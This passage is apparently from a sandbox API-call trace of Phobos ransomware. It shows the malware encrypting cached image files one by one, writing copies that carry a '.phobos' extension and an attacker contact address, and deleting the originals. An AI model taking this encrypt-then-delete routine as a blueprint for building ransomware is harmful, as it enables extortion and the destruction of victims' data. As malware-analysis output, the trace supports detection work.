dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0180.762] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0180.762] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0180.762] CryptDestroyKey (hKey=0xa32de8) returned 1 [0180.762] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0180.762] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0180.762] CloseHandle (hObject=0x194) returned 1 [0180.762] CloseHandle (hObject=0x134) returned 1 [0180.762] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\19619569[1].gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\19619569[1].gif")) returned 1 [0180.763] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0180.763] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA3DGHW[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa3dghw[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0180.764] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=333) returned 1 [0180.764] CloseHandle (hObject=0x134) returned 1 [0180.764] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA3DGHW[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa3dghw[1].png")) returned 0x2020 [0180.764] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA3DGHW[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa3dghw[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.764] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA3DGHW[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa3dghw[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0180.764] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0180.764] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0180.764] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA3DGHW[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa3dghw[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0180.766] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0180.766] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0180.766] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x14d, lpOverlapped=0x0) returned 1 [0180.771] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x150, dwBufLen=0x150 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x150) returned 1 [0180.771] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x150, lpOverlapped=0x0) returned 1 [0180.772] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a68) returned 1 [0180.772] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0180.772] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0180.772] CryptDestroyKey (hKey=0xa32a68) returned 1 [0180.772] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0180.773] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0180.773] CloseHandle (hObject=0x134) returned 1 [0180.773] CloseHandle (hObject=0x194) returned 1 [0180.773] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA3DGHW[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa3dghw[1].png")) returned 1 [0180.774] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0180.774] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA3e1pt[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa3e1pt[2].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0180.777] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=407) returned 1 [0180.777] CloseHandle (hObject=0x194) returned 1 [0180.777] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA3e1pt[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa3e1pt[2].png")) returned 0x2020 [0180.777] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA3e1pt[2].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa3e1pt[2].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.777] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA3e1pt[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa3e1pt[2].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0180.777] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0180.778] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0180.778] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA3e1pt[2].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa3e1pt[2].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0180.778] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0180.778] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0180.778] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x197, lpOverlapped=0x0) returned 1 [0180.786] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1a0, dwBufLen=0x1a0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1a0) returned 1 [0180.786] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1a0, lpOverlapped=0x0) returned 1 [0180.787] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0180.787] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0180.787] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0180.787] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0180.787] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0180.788] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0180.788] CloseHandle (hObject=0x194) returned 1 [0180.788] CloseHandle (hObject=0x134) returned 1 [0180.788] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA3e1pt[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa3e1pt[2].png")) returned 1 [0180.789] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0180.789] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA42ckd[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa42ckd[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0180.793] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=706) returned 1 [0180.793] CloseHandle (hObject=0x134) returned 1 [0180.793] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA42ckd[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa42ckd[1].png")) returned 0x2020 [0180.793] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA42ckd[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa42ckd[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.793] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA42ckd[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa42ckd[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0180.793] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0180.793] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0180.793] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA42ckd[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa42ckd[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0180.794] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0180.794] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0180.794] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2c2, lpOverlapped=0x0) returned 1 [0180.807] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2d0, dwBufLen=0x2d0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2d0) returned 1 [0180.807] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2d0, lpOverlapped=0x0) returned 1 [0180.809] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0180.809] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0180.809] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0180.809] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0180.809] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0180.809] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0180.809] CloseHandle (hObject=0x134) returned 1 [0180.809] CloseHandle (hObject=0x194) returned 1 [0180.809] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA42ckd[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa42ckd[1].png")) returned 1 [0180.811] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0180.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA42eYr[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa42eyr[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0180.811] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=706) returned 1 [0180.811] CloseHandle (hObject=0x194) returned 1 [0180.812] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA42eYr[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa42eyr[1].png")) returned 0x2020 [0180.812] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA42eYr[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa42eyr[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA42eYr[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa42eyr[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0180.812] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0180.812] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0180.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA42eYr[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa42eyr[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0180.813] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0180.814] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0180.814] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2c2, lpOverlapped=0x0) returned 1 [0180.890] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2d0, dwBufLen=0x2d0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2d0) returned 1 [0180.890] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2d0, lpOverlapped=0x0) returned 1 [0180.891] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0180.891] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0180.891] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0180.891] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0180.891] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0180.891] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0180.891] CloseHandle (hObject=0x194) returned 1 [0180.891] CloseHandle (hObject=0x134) returned 1 [0180.892] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA42eYr[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa42eyr[1].png")) returned 1 [0180.893] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0180.893] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA6SNZ6[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa6snz6[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0180.893] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=749) returned 1 [0180.893] CloseHandle (hObject=0x134) returned 1 [0180.894] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA6SNZ6[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa6snz6[1].png")) returned 0x2020 [0180.894] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA6SNZ6[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa6snz6[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.894] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\AA6SNZ6[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\aa6snz6[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 